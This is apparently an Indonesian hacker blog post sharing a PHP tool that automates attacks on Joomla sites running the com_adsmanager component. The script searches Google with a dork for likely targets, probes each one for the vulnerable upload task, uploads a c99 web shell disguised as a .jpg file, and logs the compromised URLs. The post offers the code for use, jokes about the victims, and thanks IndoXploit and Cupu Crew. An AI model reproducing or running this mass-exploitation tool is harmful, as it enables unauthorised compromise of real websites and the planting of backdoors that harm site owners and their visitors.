Joomla Component com_adsmanager Auto Dorker+Xploiter ~ Xmedia

Hai para hekel maho :v

Oke lansung aja sedot script buatan IndoXploit ,..

<?php
    set_time_limit(0);
    ini_set('memory_limit', '64M');
    header('Content-Type: text/html; charset=UTF-8');
    
    function letItBy() { 
        ob_flush();
        flush(); 
    }
    function google_that($query, $page=1){
        $resultPerPage=8;
        $start = $page*$resultPerPage;
        $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw[&key=API_KEY_GOOGLE]&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); // kalo punya google api bisa di pake "&key=API_KEY_GOOGLE" kalo tidak punya bisa dihapus aja bagian itunya, gua saranin pake google api key biar resultnya Jos kgk kena google captcha
        $resultFromGoogle = json_decode( http_get($url, true) ,true);
        if(isset($resultFromGoogle['responseStatus'])) {
            if($resultFromGoogle['responseStatus'] != '200') return false;
            if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
            else return $resultFromGoogle['responseData']['results'];
        } else
            die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );

}
    function http_get($url, $safemode = false){
        if($safemode === true) sleep(1);
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close();
    }
    function check_injection($url){
        $data = http_get( str_replace("=com_adsmanager", "=com_adsmanager&task=upload&tmpl=component", $url) );
        return preg_match('/"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile"/', $data);
    }
?>
<!DOCTYPE html>
<style type="text/css">
a {
    text-decoration: none;
    color: green;
}
</style>
<form method="post">
            Dork: 
            <input style="border: 1px dashed #000; background: transparent; color: #bb0000; padding-left: 5px;" type="text" id="dork" name="dork" value="inurl:/index.php?option=com_adsmanager" />
            <input style="border: 1px dashed #000; background: transparent; color: #bb0000;" type="submit" value="Start" id="button"/>
        </form>
<?php
            if(isset($_POST['dork']{0})){
                echo "<hr width='50%' color='#008000'>
";
                letItBy();            
                for($googlePage = 1; $googlePage <= 10; $googlePage++){
                    $googleResult = google_that($_POST['dork'], $googlePage);
                    if(!$googleResult){
                        echo 'google dont have more result, so I done..(?)';
                        break;
                    }
                    for($victim = 0; $victim < sizeof($googleResult); $victim++) {
                        if(check_injection($googleResult[$victim]['unescapedUrl'])){
                        echo "<div style='margin: 5px auto; padding-left: 7px;'>";
                        $site = "http://".$googleResult[$victim]['visibleUrl']."/index.php?option=com_adsmanager&task=upload&tmpl=component";
                        echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
                        echo "[+] Ada Cuk!! => <a href='$site' target='_blank'> $site </a><br>";
                        echo "[?] Bntr ya , mau di anu dulu :p<br>";
                        $file = "namashell_anda.php"; // nama shell yang nantinya di upload ke target
                        $postdata = array(
                            "file"=>"@c99.jpg",
                            "name"=>"$file"); // shell yang akan diupload pertama harus ber ekstensi/fomat .jpg bukan .php
                        $x = curl_init("{$site}");
                              curl_setopt($x, CURLOPT_RETURNTRANSFER, 1);
                              curl_setopt($x, CURLOPT_POST, 1);
                              curl_setopt($x, CURLOPT_POSTFIELDS, $postdata);
                              $res = curl_exec($x);
                             if(preg_match("/error_log/", $res)) { // "errog_log" diganti dengan nama file anda ex: "c99" atau "shell"
                                 $fh = fopen("sh3.txt","a"); // log result yang berhasil ke exploit 
                                 fwrite($fh, "http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file"."\n");
                                 fclose($fh);
                                 echo "[+] <font color=green>Wih Hoki bener lu cok !! Sukses di anu => <a href='http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file' target='_blank'> http://".$googleResult[$victim]['visibleUrl']."/tmp/plupload/$file </a> <==</font>","<br>";
                             } else {
                                 echo "[-] <font color=red>Yah Gagal Di Anu cok xixixi :p</font><br>";
                                 }
                             echo "</div>
";
                              curl_close($x);
                        }
                        else echo "<div style='margin: 5px auto; padding-left: 7px;'>
";
                        echo "[+] Scan : <font color=green> http://".$googleResult[$victim]['visibleUrl']."/</font><br>";
                        echo "[-] <font color=red>Ga nemu cuk! </font><br>";
                        echo "</div>
";
                        letItBy();
                    }
                }
            }
        ?>
        </div>
</body>
</html>

Dah tau kan cara pakek ?? , :p

Special Thank's to : IndoXploit And Cupu Crew